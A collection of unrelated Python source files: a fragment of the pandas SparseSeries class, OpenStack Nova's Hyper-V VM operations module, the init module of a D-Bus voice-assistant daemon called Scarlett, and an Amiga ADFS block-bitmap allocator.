new_array, index=self.index,
sparse_index=new_array.sp_index).__finalize__(self)
@Appender(generic._shared_docs['isna'] % _shared_doc_kwargs)
def isna(self):
arr = SparseArray(isna(self.values.sp_values),
sparse_index=self.values.sp_index,
fill_value=isna(self.fill_value))
return self._constructor(arr, index=self.index).__finalize__(self)
isnull = isna
@Appender(generic._shared_docs['notna'] % _shared_doc_kwargs)
def notna(self):
arr = SparseArray(notna(self.values.sp_values),
sparse_index=self.values.sp_index,
fill_value=notna(self.fill_value))
return self._constructor(arr, index=self.index).__finalize__(self)
notnull = notna
def dropna(self, axis=0, inplace=False, **kwargs):
"""
Analogous to Series.dropna. If fill_value=NaN, returns a dense Series
"""
# TODO: make more efficient
axis = self._get_axis_number(axis or 0)
dense_valid = self.to_dense().dropna()
if inplace:
raise NotImplementedError("Cannot perform inplace dropna"
" operations on a SparseSeries")
if isna(self.fill_value):
return dense_valid
else:
dense_valid = dense_valid[dense_valid != self.fill_value]
return dense_valid.to_sparse(fill_value=self.fill_value)
@Appender(generic._shared_docs['shift'] % _shared_doc_kwargs)
def shift(self, periods, freq=None, axis=0):
if periods == 0:
return self.copy()
# no special handling of fill values yet
if not isna(self.fill_value):
shifted = self.to_dense().shift(periods, freq=freq,
axis=axis)
return shifted.to_sparse(fill_value=self.fill_value,
kind=self.kind)
if freq is not None:
return self._constructor(
self.sp_values, sparse_index=self.sp_index,
index=self.index.shift(periods, freq),
fill_value=self.fill_value).__finalize__(self)
int_index = self.sp_index.to_int_index()
new_indices = int_index.indices + periods
start, end = new_indices.searchsorted([0, int_index.length])
new_indices = new_indices[start:end]
new_sp_index = _make_index(len(self), new_indices, self.sp_index)
arr = self.values._simple_new(self.sp_values[start:end].copy(),
new_sp_index, fill_value=np.nan)
return self._constructor(arr, index=self.index).__finalize__(self)
def combine_first(self, other):
"""
Combine Series values, choosing the calling Series's values
first. Result index will be the union of the two indexes
Parameters
----------
other : Series
Returns
-------
y : Series
"""
if isinstance(other, SparseSeries):
other = other.to_dense()
dense_combined = self.to_dense().combine_first(other)
return dense_combined.to_sparse(fill_value=self.fill_value)
def to_coo(self, row_levels=(0, ), column_levels=(1, ), sort_labels=False):
"""
Create a scipy.sparse.coo_matrix from a SparseSeries with MultiIndex.
Use row_levels and column_levels to determine the row and column
coordinates respectively. row_levels and column_levels are the names
(labels) or numbers of the levels. {row_levels, column_levels} must be
a partition of the MultiIndex level names (or numbers).
Parameters
----------
row_levels : tuple/list
column_levels : tuple/list
sort_labels : bool, default False
Sort the row and column labels before forming the sparse matrix.
Returns
-------
y : scipy.sparse.coo_matrix
rows : list (row labels)
columns : list (column labels)
Examples
--------
>>> s = pd.Series([3.0, np.nan, 1.0, 3.0, np.nan, np.nan])
>>> s.index = pd.MultiIndex.from_tuples([(1, 2, 'a', 0),
(1, 2, 'a', 1),
(1, 1, 'b', 0),
(1, 1, 'b', 1),
(2, 1, 'b', 0),
(2, 1, 'b', 1)],
names=['A', 'B', 'C', 'D'])
>>> ss = s.to_sparse()
>>> A, rows, columns = ss.to_coo(row_levels=['A', 'B'],
column_levels=['C', 'D'],
sort_labels=True)
>>> A
<3x4 sparse matrix of type '<class 'numpy.float64'>'
with 3 stored elements in COOrdinate format>
>>> A.todense()
matrix([[ 0., 0., 1., 3.],
[ 3., 0., 0., 0.],
[ 0., 0., 0., 0.]])
>>> rows
[(1, 1), (1, 2), (2, 1)]
>>> columns
[('a', 0), ('a', 1), ('b', 0), ('b', 1)]
"""
A, rows, columns = _sparse_series_to_coo(self, row_levels,
column_levels,
sort_labels=sort_labels)
return A, rows, columns
@classmethod
def from_coo(cls, A, dense_index=False):
"""
Create a SparseSeries from a scipy.sparse.coo_matrix.
Parameters
----------
A : scipy.sparse.coo_matrix
dense_index : bool, default False
If False (default), the SparseSeries index consists of only the
coords of the non-null entries of the original coo_matrix.
If True, the SparseSeries index consists of the full sorted
(row, col) coordinates of the coo_matrix.
Returns
-------
s : SparseSeries
Examples
---------
>>> from scipy import sparse
>>> A = sparse.coo_matrix(([3.0, 1.0, 2.0], ([1, 0, 0], [0, 2, 3])),
shape=(3, 4))
>>> A
<3x4 sparse matrix of type '<class 'numpy.float64'>'
with 3 stored elements in COOrdinate format>
>>> A.todense()
matrix([[ 0., 0., 1., 2.],
[ 3., 0., 0., 0.],
[ 0., 0., 0., 0.]])
>>> ss = pd.SparseSeries.from_coo(A)
>>> ss
0 2 1
3 2
1 0 3
dtype: float64
BlockIndex
Block locations: array([0], dtype=int32)
Block lengths: array([3], dtype=int32)
"""
return _coo_to_sparse_series(A, dense_index=dense_index)
# overwrite series methods with unaccelerated Sparse-specific versions
ops.add_flex_arithmetic_methods(SparseSeries)
ops.add_special_arithmetic_methods(SparseSeries)
|
|
# Copyright (c) 2010 Cloud.com, Inc
# Copyright 2012 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Management class for basic VM operations.
"""
import functools
import os
from oslo.config import cfg
from nova.api.metadata import base as instance_metadata
from nova import exception
from nova.openstack.common import excutils
from nova.openstack.common.gettextutils import _
from nova.openstack.common import importutils
from nova.openstack.common import log as logging
from nova.openstack.common import processutils
from nova.openstack.common import units
from nova import utils
from nova.virt import configdrive
from nova.virt.hyperv import constants
from nova.virt.hyperv import imagecache
from nova.virt.hyperv import utilsfactory
from nova.virt.hyperv import vhdutilsv2
from nova.virt.hyperv import vmutils
from nova.virt.hyperv import volumeops
LOG = logging.getLogger(__name__)
hyperv_opts = [
cfg.BoolOpt('limit_cpu_features',
default=False,
help='Required for live migration among '
'hosts with different CPU features'),
cfg.BoolOpt('config_drive_inject_password',
default=False,
help='Sets the admin password in the config drive image'),
cfg.StrOpt('qemu_img_cmd',
default="qemu-img.exe",
help='Path of qemu-img command which is used to convert '
'between different image types'),
cfg.BoolOpt('config_drive_cdrom',
default=False,
help='Attaches the Config Drive image as a cdrom drive '
'instead of a disk drive'),
cfg.BoolOpt('enable_instance_metrics_collection',
default=False,
help='Enables metrics collections for an instance by using '
'Hyper-V\'s metric APIs. Collected data can by retrieved '
'by other apps and services, e.g.: Ceilometer. '
'Requires Hyper-V / Windows Server 2012 and above'),
cfg.FloatOpt('dynamic_memory_ratio',
default=1.0,
help='Enables dynamic memory allocation (ballooning) when '
'set to a value greater than 1. The value expresses '
'the ratio between the total RAM assigned to an '
'instance and its startup RAM amount. For example a '
'ratio of 2.0 for an instance with 1024MB of RAM '
'implies 512MB of RAM allocated at startup')
]
CONF = cfg.CONF
CONF.register_opts(hyperv_opts, 'hyperv')
CONF.import_opt('use_cow_images', 'nova.virt.driver')
CONF.import_opt('network_api_class', 'nova.network')
def check_admin_permissions(function):
@functools.wraps(function)
def wrapper(self, *args, **kwds):
# Make sure the windows account has the required admin permissions.
self._vmutils.check_admin_permissions()
return function(self, *args, **kwds)
return wrapper
class VMOps(object):
_vif_driver_class_map = {
'nova.network.neutronv2.api.API':
'nova.virt.hyperv.vif.HyperVNeutronVIFDriver',
'nova.network.api.API':
'nova.virt.hyperv.vif.HyperVNovaNetworkVIFDriver',
}
def __init__(self):
self._vmutils = utilsfactory.get_vmutils()
self._vhdutils = utilsfactory.get_vhdutils()
self._pathutils = utilsfactory.get_pathutils()
self._volumeops = volumeops.VolumeOps()
self._imagecache = imagecache.ImageCache()
self._vif_driver = None
self._load_vif_driver_class()
def _load_vif_driver_class(self):
try:
class_name = self._vif_driver_class_map[CONF.network_api_class]
self._vif_driver = importutils.import_object(class_name)
except KeyError:
raise TypeError(_("VIF driver not found for "
"network_api_class: %s") %
CONF.network_api_class)
def list_instances(self):
return self._vmutils.list_instances()
def get_info(self, instance):
"""Get information about the VM."""
LOG.debug(_("get_info called for instance"), instance=instance)
instance_name = instance['name']
if not self._vmutils.vm_exists(instance_name):
raise exception.InstanceNotFound(instance_id=instance['uuid'])
info = self._vmutils.get_vm_summary_info(instance_name)
state = constants.HYPERV_POWER_STATE[info['EnabledState']]
return {'state': state,
'max_mem': info['MemoryUsage'],
'mem': info['MemoryUsage'],
'num_cpu': info['NumberOfProcessors'],
'cpu_time': info['UpTime']}
def _create_root_vhd(self, context, instance):
base_vhd_path = self._imagecache.get_cached_image(context, instance)
format_ext = base_vhd_path.split('.')[-1]
root_vhd_path = self._pathutils.get_root_vhd_path(instance['name'],
format_ext)
try:
if CONF.use_cow_images:
LOG.debug(_("Creating differencing VHD. Parent: "
"%(base_vhd_path)s, Target: %(root_vhd_path)s"),
{'base_vhd_path': base_vhd_path,
'root_vhd_path': root_vhd_path})
self._vhdutils.create_differencing_vhd(root_vhd_path,
base_vhd_path)
else:
LOG.debug(_("Copying VHD image %(base_vhd_path)s to target: "
"%(root_vhd_path)s"),
{'base_vhd_path': base_vhd_path,
'root_vhd_path': root_vhd_path})
self._pathutils.copyfile(base_vhd_path, root_vhd_path)
base_vhd_info = self._vhdutils.get_vhd_info(base_vhd_path)
base_vhd_size = base_vhd_info['MaxInternalSize']
root_vhd_size = instance['root_gb'] * units.Gi
# NOTE(lpetrut): Checking the namespace is needed as the
# following method is not yet implemented in vhdutilsv2.
if not isinstance(self._vhdutils, vhdutilsv2.VHDUtilsV2):
root_vhd_internal_size = (
self._vhdutils.get_internal_vhd_size_by_file_size(
root_vhd_path, root_vhd_size))
else:
root_vhd_internal_size = root_vhd_size
if root_vhd_internal_size < base_vhd_size:
error_msg = _("Cannot resize a VHD to a smaller size, the"
" original size is %(base_vhd_size)s, the"
" newer size is %(root_vhd_size)s"
) % {'base_vhd_size': base_vhd_size,
'root_vhd_size': root_vhd_internal_size}
raise vmutils.HyperVException(error_msg)
elif root_vhd_internal_size > base_vhd_size:
LOG.debug(_("Resizing VHD %(root_vhd_path)s to new "
"size %(root_vhd_size)s"),
{'root_vhd_size': root_vhd_internal_size,
'root_vhd_path': root_vhd_path})
self._vhdutils.resize_vhd(root_vhd_path, root_vhd_size)
except Exception:
with excutils.save_and_reraise_exception():
if self._pathutils.exists(root_vhd_path):
self._pathutils.remove(root_vhd_path)
return root_vhd_path
def create_ephemeral_vhd(self, instance):
eph_vhd_size = instance.get('ephemeral_gb', 0) * units.Gi
if eph_vhd_size:
vhd_format = self._vhdutils.get_best_supported_vhd_format()
eph_vhd_path = self._pathutils.get_ephemeral_vhd_path(
instance['name'], vhd_format)
self._vhdutils.create_dynamic_vhd(eph_vhd_path, eph_vhd_size,
vhd_format)
return eph_vhd_path
@check_admin_permissions
def spawn(self, context, instance, image_meta, injected_files,
admin_password, network_info, block_device_info=None):
"""Create a new VM and start it."""
LOG.info(_("Spawning new instance"), instance=instance)
instance_name = instance['name']
if self._vmutils.vm_exists(instance_name):
raise exception.InstanceExists(name=instance_name)
# Make sure we're starting with a clean slate.
self._delete_disk_files(instance_name)
if self._volumeops.ebs_root_in_block_devices(block_device_info):
root_vhd_path = None
else:
root_vhd_path = self._create_root_vhd(context, instance)
eph_vhd_path = self.create_ephemeral_vhd(instance)
try:
self.create_instance(instance, network_info, block_device_info,
root_vhd_path, eph_vhd_path)
if configdrive.required_by(instance):
self._create_config_drive(instance, injected_files,
admin_password)
self.power_on(instance)
except Exception as ex:
LOG.exception(ex)
self.destroy(instance)
raise vmutils.HyperVException(_('Spawn instance failed'))
def create_instance(self, instance, network_info, block_device_info,
root_vhd_path, eph_vhd_path):
instance_name = instance['name']
self._vmutils.create_vm(instance_name,
instance['memory_mb'],
instance['vcpus'],
CONF.hyperv.limit_cpu_features,
CONF.hyperv.dynamic_memory_ratio)
ctrl_disk_addr = 0
if root_vhd_path:
self._vmutils.attach_ide_drive(instance_name,
root_vhd_path,
0,
ctrl_disk_addr,
constants.IDE_DISK)
ctrl_disk_addr += 1
if eph_vhd_path:
self._vmutils.attach_ide_drive(instance_name,
eph_vhd_path,
0,
ctrl_disk_addr,
constants.IDE_DISK)
self._vmutils.create_scsi_controller(instance_name)
self._volumeops.attach_volumes(block_device_info,
instance_name,
root_vhd_path is None)
for vif in network_info:
LOG.debug(_('Creating nic for instance: %s'), instance_name)
self._vmutils.create_nic(instance_name,
vif['id'],
vif['address'])
self._vif_driver.plug(instance, vif)
if CONF.hyperv.enable_instance_metrics_collection:
self._vmutils.enable_vm_metrics_collection(instance_name)
def _create_config_drive(self, instance, injected_files, admin_password):
if CONF.config_drive_format != 'iso9660':
vmutils.HyperVException(_('Invalid config_drive_format "%s"') %
CONF.config_drive_format)
LOG.info(_('Using config drive for instance: %s'), instance=instance)
extra_md = {}
if admin_password and CONF.hyperv.config_drive_inject_password:
extra_md['admin_pass'] = admin_password
inst_md = instance_metadata.InstanceMetadata(instance,
content=injected_files,
extra_md=extra_md)
instance_path = self._pathutils.get_instance_dir(
instance['name'])
configdrive_path_iso = os.path.join(instance_path, 'configdrive.iso')
LOG.info(_('Creating config drive at %(path)s'),
{'path': configdrive_path_iso}, instance=instance)
with configdrive.ConfigDriveBuilder(instance_md=inst_md) as cdb:
try:
cdb.make_drive(configdrive_path_iso)
except processutils.ProcessExecutionError as e:
with excutils.save_and_reraise_exception():
LOG.error(_('Creating config drive failed with error: %s'),
e, instance=instance)
if not CONF.hyperv.config_drive_cdrom:
drive_type = constants.IDE_DISK
configdrive_path = os.path.join(instance_path,
'configdrive.vhd')
utils.execute(CONF.hyperv.qemu_img_cmd,
'convert',
'-f',
'raw',
'-O',
'vpc',
configdrive_path_iso,
configdrive_path,
attempts=1)
self._pathutils.remove(configdrive_path_iso)
else:
drive_type = constants.IDE_DVD
configdrive_path = configdrive_path_iso
self._vmutils.attach_ide_drive(instance['name'], configdrive_path,
1, 0, drive_type)
def _disconnect_volumes(self, volume_drives):
for volume_drive in volume_drives:
self._volumeops.disconnect_volume(volume_drive)
def _delete_disk_files(self, instance_name):
self._pathutils.get_instance_dir(instance_name,
create_dir=False,
remove_dir=True)
def destroy(self, instance, network_info=None, block_device_info=None,
destroy_disks=True):
instance_name = instance['name']
LOG.info(_("Got request to destroy instance: %s"), instance_name)
try:
if self._vmutils.vm_exists(instance_name):
#Stop the VM first.
self.power_off(instance)
storage = self._vmutils.get_vm_storage_paths(instance_name)
(disk_files, volume_drives) = storage
self._vmutils.destroy_vm(instance_name)
self._disconnect_volumes(volume_drives)
else:
LOG.debug(_("Instance not found: %s"), instance_name)
if destroy_disks:
self._delete_disk_files(instance_name)
except Exception as ex:
LOG.exception(ex)
raise vmutils.HyperVException(_('Failed to destroy instance: %s') %
instance_name)
def reboot(self, instance, network_info, reboot_type):
"""Reboot the specified instance."""
LOG.debug(_("reboot instance"), instance=instance)
self._set_vm_state(instance['name'],
constants.HYPERV_VM_STATE_REBOOT)
def pause(self, instance):
"""Pause VM instance."""
LOG.debug(_("Pause instance"), instance=instance)
self._set_vm_state(instance["name"],
constants.HYPERV_VM_STATE_PAUSED)
def unpause(self, instance):
"""Unpause paused VM instance."""
LOG.debug(_("Unpause instance"), instance=instance)
self._set_vm_state(instance["name"],
constants.HYPERV_VM_STATE_ENABLED)
def suspend(self, instance):
"""Suspend the specified instance."""
LOG.debug(_("Suspend instance"), instance=instance)
self._set_vm_state(instance["name"],
constants.HYPERV_VM_STATE_SUSPENDED)
def resume(self, instance):
"""Resume the suspended VM instance."""
LOG.debug(_("Resume instance"), instance=instance)
self._set_vm_state(instance["name"],
constants.HYPERV_VM_STATE_ENABLED)
def power_off(self, instance):
"""Power off the specified instance."""
LOG.debug(_("Power off instance"), instance=instance)
self._set_vm_state(instance["name"],
constants.HYPERV_VM_STATE_DISABLED)
def power_on(self, instance):
"""Power on the specified instance."""
LOG.debug(_("Power on instance"), instance=instance)
self._set_vm_state(instance["name"],
constants.HYPERV_VM_STATE_ENABLED)
def _set_vm_state(self, vm_name, req_state):
try:
self._vmutils.set_vm_state(vm_name, req_state)
LOG.debug(_("Successfully changed state of VM %(vm_name)s"
" to: %(req_state)s"),
{'vm_name': vm_name, 'req_state': req_state})
except Exception as ex:
LOG.exception(ex)
msg = (_("Failed to change vm state of %(vm_name)s"
" to %(req_state)s") %
{'vm_name': vm_name, 'req_state': req_state})
raise vmutils.HyperVException(msg)
|
|
# -*- coding: utf-8 -*-
from scarlett.core.config import Config, ScarlettConfigLocations
import datetime
import os
import platform
import logging
import logging.config
import scarlett.errors
# NOTE: take from scarlett_improved
try:
import dbus
import dbus.service
from dbus.mainloop.glib import DBusGMainLoop
from dbus.mainloop.glib import threads_init
import gobject
# Initialize gtk threading
gobject.threads_init()
# If the keyword argument set_as_default is given and is true, set the new
# main loop as the default for all new Connection or Bus instances.
threads_init()
DBusGMainLoop(set_as_default=True)
import pygst
pygst.require('0.10')
from scarlett.constants import *
from scarlett import __version__
except:
gobjectnotimported = True
import textwrap
from functools import wraps
import time
import pprint
import redis
from scarlett.brain.scarlettbraini import ScarlettBrainImproved
import ast
# drops you down into pdb if exception is thrown
import sys
__author__ = 'Malcolm Jones'
__email__ = 'bossjones@theblacktonystark.com'
__version__ = '0.5.0'
Version = __version__ # for backware compatibility
# http://bugs.python.org/issue7980
datetime.datetime.strptime('', '')
UserAgent = 'Scarlett/%s Python/%s %s/%s' % (
__version__,
platform.python_version(),
platform.system(),
platform.release()
)
config = Config()
def init_logging():
for file in ScarlettConfigLocations:
try:
logging.config.fileConfig(os.path.expanduser(file))
except:
pass
class NullHandler(logging.Handler):
def emit(self, record):
pass
log = logging.getLogger('scarlett')
perflog = logging.getLogger('scarlett.perf')
log.addHandler(NullHandler())
perflog.addHandler(NullHandler())
init_logging()
# convenience function to set logging to a particular file
def set_file_logger(name, filepath, level=logging.INFO, format_string=None):
global log
if not format_string:
format_string = "%(asctime)s %(name)s [%(levelname)s]:%(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
fh = logging.FileHandler(filepath)
fh.setLevel(level)
formatter = logging.Formatter(format_string)
fh.setFormatter(formatter)
logger.addHandler(fh)
log = logger
def set_stream_logger(name, level=logging.DEBUG, format_string=None):
global log
if not format_string:
format_string = "%(asctime)s %(name)s [%(levelname)s]:%(message)s"
logger = logging.getLogger(name)
logger.setLevel(level)
fh = logging.StreamHandler()
fh.setLevel(level)
formatter = logging.Formatter(format_string)
fh.setFormatter(formatter)
logger.addHandler(fh)
log = logger
class ScarlettSystemException(dbus.DBusException):
_dbus_error_name = 'org.scarlettapp.scarlettbotexception'
class ScarlettSystem(dbus.service.Object):
""" Actual scarlett bot object that has a brain, voice, etc """
DBUS_NAME = 'org.scarlettapp.scarlettdaemon'
DBUS_PATH = '/org/scarlettapp/scarlettdaemon'
_scarlett_services = []
def __init__(self):
bus_name = dbus.service.BusName(
ScarlettSystem.DBUS_NAME,
bus=dbus.SessionBus()
)
dbus.service.Object.__init__(
self,
bus_name,
ScarlettSystem.DBUS_PATH
)
self.loop = None
# DISABLED FOR NOW # self.pool = pool = create_worker_pool()
# These will later be populated w/ scarlett core objects in the
# ./bin/scarlett_improved
self.brain = None
self.player = None
self.speaker = None
scarlett.set_stream_logger('scarlett')
self.scarlett_version_info = textwrap.dedent('''\
Scarlett {version} ({platform})
Python {pymajor}.{pyminor}.{pymicro}
PyGst {pygst_version}
Gobject {gobject_version}
'''.format(
version=__version__,
platform=sys.platform,
pymajor=sys.version_info.major,
pyminor=sys.version_info.minor,
pymicro=sys.version_info.micro,
pygst_version=pygst._pygst_version,
gobject_version=gobject.gobject.glib_version
))
scarlett.log.debug(
Fore.GREEN +
"VERSION INFO: \n\n" +
self.scarlett_version_info
)
# reserved for things like scarlett's brain, listener, player, speaker
self.base_services = []
self.features = []
# DISABLED FOR NOW # self._brain = ScarlettBrainImproved(
# DISABLED FOR NOW # host=scarlett.config.get('redis', 'host'),
# DISABLED FOR NOW # port=scarlett.config.get('redis', 'port'),
# DISABLED FOR NOW # db=scarlett.config.get('redis', 'db')
# DISABLED FOR NOW # )
#scarlett.log.debug(Fore.GREEN + "Scarlett Creating Voice Object")
# scarlett.basics.voice.play_block('pi-listening')
# scarlett_says.say_block("helllllllllllloooo")
#self.listener = GstListenerImproved("gst", self._brain, self._voice, False)
def connect_features(self):
scarlett.log.info(Fore.GREEN + "would connect feature")
pass
def scarlett_event_cb(self, scarlett_obj, message):
"""Handle message send by webbrowser.
:param scarlett_obj: ServiceFeature obj that sent the message
:type scarlett_obj: scarlett.Feature
:param message: Message containing event data
:type message: dict
"""
scarlett.log.debug(Fore.GREEN + "(service -> gtk) %s", message)
# NOTE: ast.literal_eval raises an exception if the input isn't a
# valid Python datatype, so the code won't be executed if it's not.
# NOTE: Use ast.literal_eval whenever you need eval. If you
# have Python expressions as an input that you want to
# evaluate, you shouldn't (have them).
event = ast.literal_eval(message)
scarlett.log.debug(Fore.GREEN + "Bus:Handling %s",
event['event_type'])
if event['event_type'] == 'service_state':
scarlett.log.debug(Fore.GREEN +
"RECIEVED: {} from time-started: {}".format(
event['event_type'], event['data'])
)
elif event['event_type'] == 'listener_hyp':
# TODO: Turn this into self.commander.check_cmd(hyp)
scarlett.log.debug(Fore.GREEN +
"RECIEVED: {} from listener-hyp: {}".format(
event['event_type'], event['data'])
)
else:
raise ValueError('Unknown scarlettTime message: {}'.format(event))
@dbus.service.method('org.scarlettapp.scarlettdaemon',
in_signature='', out_signature='')
def main(self):
"""Main method used to start scarlett application."""
# All PyGTK applications must have a gtk.main(). Control ends here
# and waits for an event to occur (like a key press or mouse event).
# OLD # gtk.main()
# DISABLED FOR NOW # scarlett.log.info(Fore.GREEN +
# "Starting Home Assistant (%d threads)", self.pool.worker_count)
self.loop = gobject.MainLoop()
try:
self.loop.run()
except KeyboardInterrupt:
self.Exit()
@dbus.service.method('org.scarlettapp.scarlettdaemon',
in_signature='', out_signature='')
def destroy(self):
scarlett.log.debug(Fore.YELLOW + "Destroy signal occurred")
self.remove_from_connection()
self.loop.quit() # OLD # gobject.mainloop.quit()
@dbus.service.method("org.scarlettapp.scarlettdaemon",
in_signature='', out_signature='')
def Exit(self):
scarlett.log.debug(Fore.YELLOW + "Exit signal occurred")
self.remove_from_connection()
self.loop.quit()
|
|
import struct
import ctypes
from block.BitmapBlock import BitmapBlock
from block.BitmapExtBlock import BitmapExtBlock
from FSError import *
class ADFSBitmap:
def __init__(self, root_blk):
self.root_blk = root_blk
self.blkdev = self.root_blk.blkdev
# state
self.ext_blks = []
self.bitmap_blks = []
self.bitmap_data = None
self.valid = False
# bitmap block entries
self.bitmap_blk_bytes = root_blk.blkdev.block_bytes - 4
self.bitmap_blk_longs = root_blk.blkdev.block_longs - 1
# calc size of bitmap
self.bitmap_bits = self.blkdev.num_blocks - self.blkdev.reserved
self.bitmap_longs = (self.bitmap_bits + 31) / 32
self.bitmap_bytes = (self.bitmap_bits + 7) / 8
# number of blocks required for bitmap (and bytes consumed there)
self.bitmap_num_blks = (self.bitmap_longs + self.bitmap_blk_longs - 1) / self.bitmap_blk_longs
self.bitmap_all_blk_bytes = self.bitmap_num_blks * self.bitmap_blk_bytes
# blocks stored in root and in every ext block
self.num_blks_in_root = len(self.root_blk.bitmap_ptrs)
self.num_blks_in_ext = self.blkdev.block_longs - 1
# number of ext blocks required
self.num_ext = (self.bitmap_num_blks - self.num_blks_in_root + self.num_blks_in_ext - 1) / (self.num_blks_in_ext)
# start a root block
self.find_start = root_blk.blk_num
def create(self):
# create data and preset with 0xff
self.bitmap_data = ctypes.create_string_buffer(self.bitmap_all_blk_bytes)
for i in xrange(self.bitmap_all_blk_bytes):
self.bitmap_data[i] = chr(0xff)
# clear bit for root block
blk_pos = self.root_blk.blk_num
self.clr_bit(blk_pos)
blk_pos += 1
# create ext blocks
for i in xrange(self.num_ext):
bm_ext = BitmapExtBlock(self.blkdev, blk_pos)
bm_ext.create()
self.clr_bit(blk_pos)
blk_pos += 1
self.ext_blks.append(bm_ext)
# create bitmap blocks
for i in xrange(self.bitmap_num_blks):
bm = BitmapBlock(self.blkdev, blk_pos)
bm.create()
self.clr_bit(blk_pos)
blk_pos += 1
self.bitmap_blks.append(bm)
# set pointers to ext blocks
if self.num_ext > 0:
self.root_blk.bitmap_ext_blk = self.ext_blks[0].blk_num
for i in xrange(self.num_ext-1):
bm_ext = self.ext_blks[i]
bm_ext_next = self.ext_blks[i+1]
bm_ext.bitmap_ext_blk = bm_ext_next.blk_num
# set pointers to bitmap blocks
cur_ext_index = 0
cur_ext_pos = 0
for i in xrange(self.bitmap_num_blks):
blk_num = self.bitmap_blks[i].blk_num
if i < self.num_blks_in_root:
# pointers in root block
self.root_blk.bitmap_ptrs[i] = blk_num
else:
# pointers in ext block
self.ext_blks[cur_ext_index].bitmap_ptrs[cur_ext_pos] = blk_num
cur_ext_pos += 1
if cur_ext_pos == self.num_blks_in_ext:
cur_ext_pos = 0
cur_ext_index += 1
self.valid = True
def write(self):
# write root block
self.root_blk.write()
# write ext blocks
for ext_blk in self.ext_blks:
ext_blk.write()
self.write_only_bits()
def write_only_bits(self):
# write bitmap blocks
off = 0
for blk in self.bitmap_blks:
blk.set_bitmap_data(self.bitmap_data[off:off+self.bitmap_blk_bytes])
blk.write()
off += self.bitmap_blk_bytes
def read(self):
self.bitmap_blks = []
bitmap_data = ""
# get bitmap blocks from root block
blocks = self.root_blk.bitmap_ptrs
for blk in blocks:
if blk == 0:
break
bm = BitmapBlock(self.blkdev, blk)
bm.read()
if not bm.valid:
raise FSError(INVALID_BITMAP_BLOCK, block=bm)
self.bitmap_blks.append(bm)
bitmap_data += bm.get_bitmap_data()
# now check extended bitmap blocks
ext_blk = self.root_blk.bitmap_ext_blk
while ext_blk != 0:
bm_ext = BitmapExtBlock(self.blkdev, ext_blk)
bm_ext.read()
self.ext_blks.append(bm_ext)
blocks = bm_ext.bitmap_ptrs
for blk in blocks:
if blk == 0:
break
bm = BitmapBlock(self.blkdev, blk)
bm.read()
if not bm.valid:
raise FSError(INVALID_BITMAP_BLOCK, block=bm)
bitmap_data += bm.get_bitmap_data()
self.bitmap_blks.append(bm)
ext_blk = bm_ext.bitmap_ext_blk
# check bitmap data
num_bm_blks = len(self.bitmap_blks)
num_bytes = self.bitmap_blk_bytes * num_bm_blks
if num_bytes != len(bitmap_data):
raise FSError(BITMAP_SIZE_MISMATCH, node=self, extra="got=%d want=%d" % (len(bitmap_data), num_bytes))
if num_bm_blks != self.bitmap_num_blks:
raise FSError(BITMAP_BLOCK_COUNT_MISMATCH, node=self, extra="got=%d want=%d" % (self.bitmap_num_blks, num_bm_blks))
# create a modyfiable bitmap
self.bitmap_data = ctypes.create_string_buffer(bitmap_data)
self.valid = True
def find_free(self, start=None):
# give start of search
if start == None:
pos = self.find_start
else:
pos = start
# at most scan all bits
num = self.bitmap_bits
while num > 0:
# a free bit?
found = self.get_bit(pos)
old_pos = pos
pos += 1
if pos == self.bitmap_bits + self.blkdev.reserved:
pos = self.blkdev.reserved
if found:
# start a next position
self.find_start = pos
return old_pos
num -= 1
return None
def find_n_free(self, num, start=None):
first_blk = self.find_free(start)
if first_blk == None:
return None
if num == 1:
return [first_blk]
result = [first_blk]
for i in xrange(num-1):
blk_num = self.find_free()
if blk_num == None:
return None
if blk_num in result:
return None
result.append(blk_num)
return result
def get_num_free(self):
num = 0
for i in xrange(self.bitmap_bits):
if self.get_bit(i):
num+=1
return num
def alloc_n(self, num, start=None):
free_blks = self.find_n_free(num, start)
if free_blks == None:
return None
for b in free_blks:
self.clr_bit(b)
self.write_only_bits()
return free_blks
def dealloc_n(self, blks):
for b in blks:
self.set_bit(b)
self.write_only_bits()
def get_bit(self, off):
if off < self.blkdev.reserved or off >= self.blkdev.num_blocks:
return None
off = (off - self.blkdev.reserved)
long_off = off / 32
bit_off = off % 32
val = struct.unpack_from(">I", self.bitmap_data, long_off * 4)[0]
mask = 1 << bit_off
return (val & mask) == mask
# mark as free
def set_bit(self, off):
if off < self.blkdev.reserved or off >= self.blkdev.num_blocks:
return False
off = (off - self.blkdev.reserved)
long_off = off / 32
bit_off = off % 32
val = struct.unpack_from(">I", self.bitmap_data, long_off * 4)[0]
mask = 1 << bit_off
val = val | mask
struct.pack_into(">I", self.bitmap_data, long_off * 4, val)
return True
# mark as used
def clr_bit(self, off):
if off < self.blkdev.reserved or off >= self.blkdev.num_blocks:
return False
off = (off - self.blkdev.reserved)
long_off = off / 32
bit_off = off % 32
val = struct.unpack_from(">I", self.bitmap_data, long_off * 4)[0]
mask = 1 << bit_off
val = val & ~mask
struct.pack_into(">I", self.bitmap_data, long_off * 4, val)
return True
def dump(self):
print "Bitmap:"
print " ext: ",self.ext_blks
print " blks:",len(self.bitmap_blks)
print " bits:",len(self.bitmap_data) * 8,self.blkdev.num_blocks
def create_draw_bitmap(self):
bm = ctypes.create_string_buffer(self.blkdev.num_blocks)
for i in xrange(self.blkdev.num_blocks):
bm[i] = chr(0)
return bm
def print_free(self, brief=False):
bm = self.create_draw_bitmap()
res = self.blkdev.reserved
for i in xrange(self.blkdev.num_blocks):
if i >= res and self.get_bit(i):
bm[i] = 'F'
self.print_draw_bitmap(bm, brief)
def print_used(self, brief=False):
bm = self.create_draw_bitmap()
res = self.blkdev.reserved
for i in xrange(self.blkdev.num_blocks):
if i >= res and not self.get_bit(i):
bm[i] = '#'
self.print_draw_bitmap(bm, brief)
def draw_on_bitmap(self, bm):
# show reserved blocks
res = self.blkdev.reserved
bm[0:res] = "x" * res
# root block
bm[self.root_blk.blk_num] = 'R'
# bitmap blocks
for bm_blk in self.bitmap_blks:
bm[bm_blk.blk_num] = 'b'
# bitmap ext blocks
for ext_blk in self.ext_blks:
bm[ext_blk.blk_num] = 'B'
